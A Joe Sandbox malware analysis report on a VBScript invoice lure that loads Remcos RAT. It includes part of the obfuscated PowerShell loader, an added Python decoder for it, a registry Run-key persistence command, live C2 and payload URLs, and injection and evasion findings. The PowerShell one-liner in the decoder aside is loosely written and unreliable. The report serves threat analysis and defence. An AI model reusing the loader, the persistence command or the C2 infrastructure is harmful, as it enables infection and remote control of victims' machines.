alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
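                The command line captured above carries the sample's own string decoder, `pepperiness`, and the dispatcher `Isopor`, which invokes whatever `$Hovedkarakterer` holds. The Python port below is an added example for this report, not code from the sample or from Joe Sandbox; the literals it decodes are copied verbatim from the command line. It assumes that `$selvvirkendes` and `$Unlimned` are never assigned (neither appears on the left of an assignment in the visible script), so `$Saltvandsfisk` is `$host.UI`, `$Envisaging` becomes 1 on every call, and `$possesses` is the literal's length minus one. Under that bound the loop takes the character at index 4 and every fifth one after it, and never reaches the trailing padding space that closes each literal. Decoding `$Hovedkarakterer` yields `IeX`, so every `Isopor (pepperiness '...')` call is `Invoke-Expression` on decoded text. One caveat: the Danish filler words lost their non-ASCII letters when this report was rendered, so literals that contained them (the user-agent tail and the download URL among them) no longer decode cleanly from the text shown here; run the decoder against the script as captured in the raw process command line instead.

```python
"""Decoder for the GuLoader-style string obfuscation seen in the captured command line.

`pepperiness` in the script does:
    for ($i = 4; $i -lt ($len - 1); $i += 5) { $out += $s[$i] }
i.e. keep index 4 and every fifth character after it, stopping before the
final padding space. This is an added example, not code from the sample.
"""
import re

def pepperiness(s: str) -> str:
    """Python port of the decoder: characters at 4, 9, 14, ... strictly below len-1.

    The upper bound is len-1 because $possesses = $Unlimned + len - $Envisaging
    with $Unlimned unset (0) and $Envisaging incremented once per call (1);
    that assumption is taken from the visible script, where neither variable
    is ever assigned.
    """
    return "".join(s[i] for i in range(4, len(s) - 1, 5))

# Literals copied verbatim from the command line in the report.
SAMPLES = {
    "$Hovedkarakterer": "CockIdumhe SinXAnse ",
    "$Efterords": "DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ",
    "$haole": "tetr>Wels ",
    "$Folkeskoleomraadet": "IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ",
}

# Every quoted literal handed to the decoder; the literals never contain a quote.
LITERAL = re.compile(r"pepperiness\s+'([^']*)'")

def decode_script(script: str) -> list:
    """Decode each `pepperiness '...'` literal in a captured command line, in order."""
    return [pepperiness(m.group(1)) for m in LITERAL.finditer(script)]

# Constructed fragment assembled from three of the page's literals, not the full
# command line; used to show bulk decoding of a captured script.
FRAGMENT = (
    "$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';"
    "$haole=pepperiness 'tetr>Wels ';"
    "$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';"
)

if __name__ == "__main__":
    for name, lit in SAMPLES.items():
        print(f"{name:22s} -> {pepperiness(lit)!r}")
    print(decode_script(FRAGMENT))
```

Running the block prints `IeX`, `usEr-agent`, `>` and `Mozilla/` for the four literals, which is enough to read the script's intent: a web request with a spoofed browser user-agent, output redirected to a file, and the result evaluated with `iex`. The same slice in PowerShell, for use inside an analysis VM, is `-join $s[4..($s.Length-2)] | ? { $i++ % 5 -eq 0 }`-style indexing; the Python form is kept here because it runs anywhere the report is read.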
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_09182B10 push esi; ret 5_2_09182B11
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_09183B88 push 087BE6F5h; iretd 5_2_09183B97
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_09181A0B push eax; ret 5_2_09181A0C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_09181E05 push ss; ret 5_2_09181E0F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0918305A push ds; retf 5_2_0918305B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_09182074 push ebx; ret 5_2_0918207F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_0918572A push eax; ret 5_2_0918572B
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_04261E05 push ss; ret 10_2_04261E0F
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_04261A0B push eax; ret 10_2_04261A0C
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_04262074 push ebx; ret 10_2_0426207F
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0426305A push ds; retf 10_2_0426305B
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_0426572A push eax; ret 10_2_0426572B
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_04262B10 push esi; ret 10_2_04262B11
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 10_2_04263B88 push 087BE6F5h; iretd 10_2_04263B97
                Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Sandsynliggrelsens (2 identical entries)
                Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (81 identical entries)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (75 identical entries)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Initial file Initial file: Do While Epistolizer.Status = 0 WScript.Sleep 100
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4258
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5666
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7328
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2486
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036 Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3484 Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 1448 Thread sleep count: 3429 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 7752 Thread sleep time: -42000s >= -30000s
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 7752 Thread sleep count: 5556 > 30
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 7752 Thread sleep time: -16668000s >= -30000s
                Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exe Thread sleep count: Count: 3429 delay: -5
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000003.00000002.1780113469.000001CBB41C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsm
                Source: PING.EXE, 00000001.00000002.1637066361.0000023528B98000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04A48860 LdrInitializeThunk,5_2_04A48860

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
                Source: Yara match File source: amsi64_7876.amsi.csv, type: OTHER
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTR
                Source: Yara match File source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
                Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager'
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager#
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2937740641.0000000007CF4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerM
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageri
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager4
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managert
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager`
                Source: msiexec.exe, 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.dr Binary or memory string: [Program Manager]
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1012, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Remote Access Functionality

Source: C:\Windows\SysWOW64\msiexec.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
Source: Yara match | File source: 0000000A.00000002.2937740641.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2949377378.000000002377E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 1012, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
ATT&CK Matrix (one column per tactic; the number in parentheses is the count the report attaches to that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Scripting (321) | Valid Accounts | Windows Management Instrumentation (1) | Scripting (321) | DLL Side-Loading (1) | Obfuscated Files or Information (2) | OS Credential Dumping | File and Directory Discovery (1) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Exploitation for Client Execution (1) | DLL Side-Loading (1) | Process Injection (312) | Software Packing (1) | LSASS Memory | System Information Discovery (13) | Remote Desktop Protocol | Data from Removable Media | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (2) | Registry Run Keys / Startup Folder (1) | Registry Run Keys / Startup Folder (1) | DLL Side-Loading (1) | Security Account Manager | Security Software Discovery (11) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Standard Port (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | PowerShell (2) | Login Hook | Login Hook | Masquerading (1) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Remote Access Software (1) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Modify Registry (1) | LSA Secrets | Virtualization/Sandbox Evasion (41) | SSH | Keylogging | Non-Application Layer Protocol (2) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Virtualization/Sandbox Evasion (41) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Application Layer Protocol (213) | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Process Injection (312) | DCSync | Remote System Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Network Configuration Discovery (1) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Behavior Graph ID: 1538533
Sample: IMGRO Facturi nepl#U0103tit...
Start date: 21/10/2024
Architecture: WINDOWS
Score: 100

Process tree as drawn in the behavior graph (graph node numbers in parentheses; bracketed figures are the per-process counts shown beside each node):

• Start (2)
  Domains/IPs: pelele.duckdns.org (37), gormezl_6777.6777.6777.677e (39), plieltd.top (41)
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
  pelele.duckdns.org: Uses dynamic DNS services
  • wscript.exe (9) [1]
    Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
    • powershell.exe (14) [14, 18]
      Network: plieltd.top 172.67.155.139, ports 443, 49737, 49744, CLOUDFLARENETUS, United States
      Signatures: Found suspicious powershell code related to unpacking or dynamic code loading
      • conhost.exe (25)
    • PING.EXE (18) [1]
      • conhost.exe (27)
  • powershell.exe (12) [18]
    Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Queues an APC in another process (thread injection)
    • msiexec.exe (20) [5, 10]
      Network: pelele.duckdns.org 185.236.203.101, ports 49745, 49746, 49747, M247GB, Romania
      Dropped file: C:\ProgramData\remcos\logs.dat, data
      Signatures: Detected Remcos RAT
      • cmd.exe (29) [1]
        • conhost.exe (31)
        • reg.exe (33) [1, 1]
    • conhost.exe (23)

Source | Detection | Scanner | Label
IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs | 0% | ReversingLabs |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pelele.duckdns.org | 185.236.203.101 | true | true | | unknown
plieltd.top | 172.67.155.139 | true | false | | unknown
gormezl_6777.6777.6777.677e | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://plieltd.top/Tlles187.deploy | false | | unknown
https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin | false | | unknown
pelele.duckdns.org | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://plieltd.top | powershell.exe, 00000003.00000002.1753278151.000001CB9DA00000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://plieltd.top/Tlles187.deployXR#l | powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://plieltd.top | powershell.exe, 00000003.00000002.1753278151.000001CB9D2C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1753278151.000001CB9BEA6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000003.00000002.1753278151.000001CB9C81E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.1774074401.000001CBABCF5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.1982397865.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lBkq | powershell.exe, 00000005.00000002.1970364131.0000000004D41000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.1753278151.000001CB9BC81000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://plieltd.top/Tlles187.deployP | powershell.exe, 00000003.00000002.1753278151.000001CB9BEA6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.1753278151.000001CB9BC81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1970364131.0000000004D41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://plieltd.top/ | msiexec.exe, 0000000A.00000002.2937740641.0000000007CD0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.1970364131.0000000004E98000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin8p | msiexec.exe, 0000000A.00000002.2937740641.0000000007C93000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.155.139 | plieltd.top | United States | 13335 | CLOUDFLARENETUS | false
185.236.203.101 | pelele.duckdns.org | Romania | 9009 | M247GB | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1538533
Start date and time: 2024-10-21 14:16:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs (renamed because the original name is a hash value)
Original Sample Name: IMGRO Facturi nepltite 56773567583658567835244234Bandido.vbs
Detection: MAL
Classification: mal100.troj.expl.evad.winVBS@16/8@4/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 59
• Number of non-executed functions: 18
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 1012 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7876 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 8168 because it is empty
